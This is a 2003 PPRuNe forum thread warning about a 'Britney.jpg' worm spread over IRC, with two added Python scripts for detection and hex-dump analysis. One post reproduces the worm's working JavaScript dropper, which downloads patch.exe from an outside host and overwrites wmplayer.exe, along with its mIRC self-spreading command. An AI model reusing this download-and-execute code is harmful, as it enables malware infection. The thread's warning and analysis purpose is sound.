PPRuNe Forums: Computer/Internet Issues & Troubleshooting

Britney.jpg worm warning

#1, 28th Oct 2003, 12:37
Naples Air Center, Inc. (The Oracle), thread starter
Britney.jpg worm warning

According to warp2search.net :

Sunday the 26th, another internet worm was released through IRC networks.
The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do, do not open britney links in Internet Explorer.
An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
The effect of this is: no shortcuts work, no programs, except those already running, will work. If mIRC is running it will proceed by installing a script that announces the URL to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory.
You know, it was only a matter of time before they were able to get .jpgs to carry viruses.

Richard
#2, 28th Oct 2003, 14:01
Evo
Are you sure about this one, Richard? I've not been able to find it on Symantec's or McAfee's databases and they're usually fairly up to date. There are a couple of 'britney.jpg.exe' type nasties but nothing that matches this - any more info?
#3, 28th Oct 2003, 20:58
BRL
Unless one has requested a picture of Britney from a mate or from her web-site (or someone you know called Britney), then I can't understand why people open these things.... They deserve all they get for being so stupid. If you haven't asked for it, don't open it......!!!!!!!!
#4, 28th Oct 2003, 22:20
Evo
I agree BRL, you are fairly dumb to click on a random attachment (but there are lots of dumb PC users...) but being able to deliver a nasty in a real jpeg is a bit different. What if you could stick it in a banner ad, so someone surfing PPRuNe would download it and IE would happily fk up your PC?

I half remember reading something about how it was possible, at least in theory, to hide executable code within a jpeg, so if there's a real live jpeg-transmitted trojan out there I'm quite interested.

<edit> Bit of searching found something; looks like it is just opening a stream to Windows Media Player and using some kind of exploit in that, don't think it's a real jpeg exploit - however, don't know if it's real and would still like a link to somebody I've heard of.
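The distinction Evo draws above (a real JPEG versus a web page that merely opens a stream to Windows Media Player) is one a proxy or mail gateway can check mechanically: a real JPEG begins with the bytes FF D8 FF regardless of what the URL calls it. The Python below is an added example, not code from the thread or from any site it mentions. It sniffs the true type of a response body, flags a name/content mismatch, and looks for the script fragments the thread describes (an XMLHTTP download, an ADODB.Stream written to disk, a handoff to an mms:// URL). The sample bodies and the example.invalid URLs are constructed for the demonstration; the function and indicator names are mine.

```python
import re

# Leading bytes every real JPEG file starts with (SOI marker plus the
# first byte of the following marker).
JPEG_MAGIC = b"\xff\xd8\xff"

# Script fragments named in the thread's description of the drive-by:
# an XMLHTTP download, an ADODB.Stream written to disk, and a handoff to
# an mms:// URL so Windows Media Player launches the overwritten binary.
INDICATORS = {
    "xmlhttp_download": re.compile(rb"ActiveXObject\s*\(\s*[\"']Microsoft\.XMLHTTP", re.I),
    "adodb_stream": re.compile(rb"ActiveXObject\s*\(\s*[\"']ADODB\.Stream", re.I),
    "save_to_file": re.compile(rb"\.SaveToFile\s*\(", re.I),
    "mms_handoff": re.compile(rb"mms://", re.I),
}


def sniff_type(data):
    """Classify a response body by its content, not by the name in the URL."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    head = data.lstrip()[:512].lower()
    if head.startswith(b"<") and (b"<html" in head or b"<script" in data.lower()):
        return "html"
    return "unknown"


def check_response(url, data):
    """Flag a response whose declared type (URL extension) disagrees with
    its real type, and list any drive-by indicators found in the body."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    actual = sniff_type(data)
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(data))
    disguised = ext in ("jpg", "jpeg") and actual != "jpeg"
    return {
        "url": url,
        "declared": ext,
        "actual": actual,
        "disguised": disguised,
        "indicators": hits,
        "verdict": "block" if (disguised or hits) else "allow",
    }


# Constructed samples (not captured traffic): a minimal real JPEG header,
# and an HTML page carrying only the indicator tokens under a .jpg name.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
SAMPLE_HTML_AS_JPG = (
    b"<html><body><script>\n"
    b"// constructed sample: indicator tokens only\n"
    b'var x = new ActiveXObject("Microsoft.XMLHTTP");\n'
    b'var s = new ActiveXObject("ADODB.Stream");\n'
    b's.SaveToFile("EXAMPLE_PLACEHOLDER.exe", 2);\n'
    b'location.href = "mms://";\n'
    b"</script></body></html>\n"
)

if __name__ == "__main__":
    for url, body in [
        ("http://example.invalid/pics/holiday.jpg", SAMPLE_JPEG),
        ("http://example.invalid/picsx/britney.jpg", SAMPLE_HTML_AS_JPG),
    ]:
        print(check_response(url, body))
```

The mismatch check alone catches the disguise even if the script changes, since nothing that renders as HTML can start with the JPEG marker; the indicator list is there to tell an operator what kind of page was blocked.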
#5, 28th Oct 2003, 23:22
Naples Air Center, Inc. (The Oracle), thread starter
Here is the transcript of what happens with the Worm. I do not believe it has an .exe in front of it, or I would not have reported it here.

The timeline:

DO NOT CLICK ON britney.jpg!!!

Under no circumstances open a URL that ends with britney.jpg. It is actually
an Internet Explorer / Windows Media Player exploit, as shown below.

-----
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
-----

patch.exe seems to be compressed with UPX, interesting strings can be found within.

0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!

This is a command it sends automatically to mIRC. This causes mIRC to send the
exploit URL to all channels you are in.

It will replace/delete Windows system files. If that happens, you might get a
message of this sort: "Files that are required for Windows to run properly have
been replaced by unrecognized versions".

This is NOT the same thing as http://koti.phnet.fi/jonninen/mircworms/britny.txt.


15:30: At this time I don't know if the worm can be removed. If it manages to delete
your Windows system files, you'll have to reinstall Windows.


15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they
are hosting.


16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in
EFnet.

According to reports, simply "repairing" the Windows install or copying the deleted
files back isn't enough, since the virus also messes around with the Windows registry.
You'll have to reinstall Windows.


16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. :-)


16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.


17:00: There's a list of Windows system files in the uncompressed version of patch.exe
starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,
userinit.exe, services.exe, etc. There are also references to some anti-virus and
firewall programs in the immediate vicinity. The virus probably disables these
programs so that it can roam freely.

Reports say that the virus does not affect Windows 98, but it definitely affects
at least Windows 2000 and XP. Anti-virus software does not help you at this point,
since none of them recognize the virus yet.

The scavenger.sharewith.us site has been disabled. This prevents the virus from
infecting machines for now, but the Angelfire page is still up and the author of
the virus could modify the page to point to another location.

The IE exploit: http://www.security.nnov.ru/search/d...asp?docid=5102


17:30: The virus might not affect Windows Media Player version 8. (see
http://www.kb.cert.org/vuls/id/222044)


19:10: According to reports, the virus does affect WMP 8 as well. Better not open
any suspicious links as long as you use IE.


2003-10-28 01:10: The exploit has been removed from Angelfire's server as well.



2003-10-28 01:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
Take Care,

Richard
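The hex dump Richard quotes carries one string split across five lines. As an added example, not from the thread and not a tool from any site it references, the Python below rebuilds the raw bytes from the dump's hex column, recovers printable strings the way the Unix strings utility does, and picks out the URL and the mIRC mass-message command. The only input is the five dump lines from the post; the function names are mine.

```python
import re

# The five dump lines as printed in the post: a 32-bit offset written as
# two 16-bit words, sixteen hex bytes, then the ASCII rendering.
HEXDUMP = """\
0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
URL_RE = re.compile(r"https?://[^\s<>\"']+")
# mIRC commands that broadcast to every joined channel; a leading '.'
# (as in /.amsg) tells mIRC to run the command without echoing it locally.
MASS_MSG = re.compile(r"^/\.?(amsg|ame)\b", re.I)


def parse_hexdump(text, width=16):
    """Rebuild the raw bytes from dump lines of the form
    'HHHH HHHH b0 ... b15 <ascii>'. The hex column is authoritative; the
    ASCII column is ignored because dumps print non-printables as '.'."""
    start, out = None, bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 + width:
            continue
        offset = int(tokens[0] + tokens[1], 16)
        if start is None:
            start = offset
        hexes = tokens[2:2 + width]
        if not all(HEX_BYTE.match(t) for t in hexes):
            raise ValueError("malformed dump line: %r" % line)
        out += bytes(int(t, 16) for t in hexes)
    return start, bytes(out)


def extract_strings(data, min_len=4):
    """Minimal 'strings': runs of printable ASCII at least min_len long."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def find_indicators(strings):
    """Pull out what an analyst wants from recovered strings: URLs
    (candidate payload or propagation hosts) and mIRC mass-message
    commands (the propagation mechanism the thread describes)."""
    urls, commands = [], []
    for s in strings:
        urls.extend(URL_RE.findall(s))
        if MASS_MSG.match(s):
            commands.append(s)
    return {"urls": urls, "irc_commands": commands}


if __name__ == "__main__":
    start, raw = parse_hexdump(HEXDUMP)
    print("recovered %d bytes from offset 0x%X" % (len(raw), start))
    print(find_indicators(extract_strings(raw)))
```

Running it against the post's dump recovers the 80-byte mIRC command beginning at offset 0x518E0. Because the dump was taken from the unpacked binary, the same approach would find nothing useful on the UPX-compressed file; unpack first, then run the string extraction.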
#6, 29th Oct 2003, 00:46
fobotcso
Luckily she never did appeal to me anyway.

From that description, Richard, I think I'll go sit in the backroom till it all dies down.
#7, 29th Oct 2003, 02:08
BRL
Thanks for letting us know Richard.
#8, 29th Oct 2003, 02:16
Naples Air Center, Inc. (The Oracle), thread starter
BRL,

Always glad to help.

Take Care,

Richard

Copyright © 2024 MH Sub I, LLC dba Internet Brands. All rights reserved. Use of this site indicates your consent to the Terms of Use.